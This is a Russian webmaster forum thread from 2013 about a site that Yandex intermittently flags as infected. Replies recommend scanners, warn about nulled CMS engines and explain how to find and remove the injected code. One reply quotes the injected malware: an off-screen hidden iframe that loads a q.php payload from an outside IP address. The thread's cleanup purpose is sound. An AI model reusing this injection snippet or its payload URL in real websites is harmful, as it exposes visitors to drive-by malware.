Попробуйте проверить через antivirus-alarm.ru иногда он даже что то дельное показывает.
- 08.03.2013 23:09
- 0
- 08.03.2013 23:11
этим совету
sitecheck.sucuri.net/scanner/- 0
- 08.03.2013 23:42Студент
- Регистрация: 29.12.2012
- Сообщений: 46
- Репутация: 0
Меня смущает 2 вещи,которые не могу понять:
1. Если есть вирус, то он должен быть постоянно,почему в течении месяца Яндес раз 10 уже написал,то есть вирус, то вируса не обнаружено.При том,что ничего конкретного вообще не делалось
2.На хостинге 80 процентов сайтов выводятся с пометкой (угожает безопасности) ,я проверял выборочно,точно также ,в 1 день какойто сайт в выдаче Яндекса покажет зараженный,во втрой день этот же сайт в выдаче именно Яндекса--чистый.
P.S.все пароли уже раз 5 меняли,движок обновили- 0
12.09.2013 21:17andys1, а вообще, мой вам совет: лучше не использовать нуленные движки. Недобросовестные хацкеры часто оставляют там сюрпризы для веб-мастеров.
Кстати вирус может срабатывать на определенные устройства, как пример. Или ваш антивирус молча блокирует его. Всё же стоит поискать в файлах тот ip адресок...- 0
- 12.09.2013 22:13Дедушка ЭМО
- Регистрация: 23.09.2010
- Сообщений: 735
- Репутация: 495
Я так понял, что это не весь вредоносный код.
<style>.hp60pdz1o { position:absolute; left:-1256px; top:-1442px} </style>-это показывает где выводится <div>.hp60pdz1o</div>
<div class="hp60pdz1o"><iframe *src="ht*p://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php" width="389" height="473"></iframe> это показывает, как выводится , в данном случае размер окна всплывающего 398*473, в нем отрывается исполняемый файл с адреса ]http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php
Видимо, есть что-то в коде, что создает этот <div>.hp60pdz1o</div>.
Я проверять, что там по адресу не стал.
Скачал бы на комп весь и проверил в редакторе на ".hp60pdz1o" и"http://129.121.35.*." и "b269c38185437d0f310fbd187c089f92/q.php" - все совпадения удалил. Потом проверил работоспособность кода.- 0
- 13.09.2013 01:57Студент
- Регистрация: 27.09.2012
- Сообщений: 74
- Репутация: 7
У вас iframe висит на сайте, сдвинутый в невидимую область. С айпишника в него подтягивается скрипт с вирусом или с кодом, считающимся вредоносным. Скорее всего он закодирован base64, и прогонять все файлы необходимо по слову base64, а затем расшифровывать. Хотя бывает и в наглую вставляют, не шифруя. Здесь поискать стоит по hp60pdz1o. Сливаете все файлы на комп и прогоняете поиском в файлах Тотал Коммандера. Найденный код корректно удалить.
- 0
- 13.09.2013 02:23Студент
- Регистрация: 11.02.2003
- Сообщений: 42
- Репутация: 18
batik, антивирус не найдет хрень в скриптах. Странно что никто не подсказал http://www.revisium.com/ai/ - для начала хватит.
Если не вылечит - будем принимать более действенные методы.
Надеюсь, про смену паролей лишний раз говорить не надо:)- 0
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Вирус на сайте? | Вопросы от новичков | 19 | 24.09.2012 16:01 |
Вирус на сайте. | WordPress | 2 | 07.04.2012 20:23 |
Вирус на сайте. | Web программирование | 1 | 03.04.2012 12:25 |
Вирус на сайте | Софт, скрипты, сервисы | 27 | 15.02.2010 21:41 |
addurl adsense avito cpa html proxy radikal wordpress yandex youtube zennoposter аккаунт баннер блог быть вконтакт год гугл деть добавить думать есть кейс ключ конечный контент магазин место может накрутка нужный отзыв оффера парсер партнёрка партнёрская программа первый программа продажа прокси просто работа работать регистрация рубль сайт сделать сервис скрипт сообщение софт ссылка стать страница трафик хороший хостинг цена шаблоны яндекс
Тем:
77,585Сообщений:
763,055Пользователей:
30,080Сейчас на сайте:
0 пользователей и 62 гостей
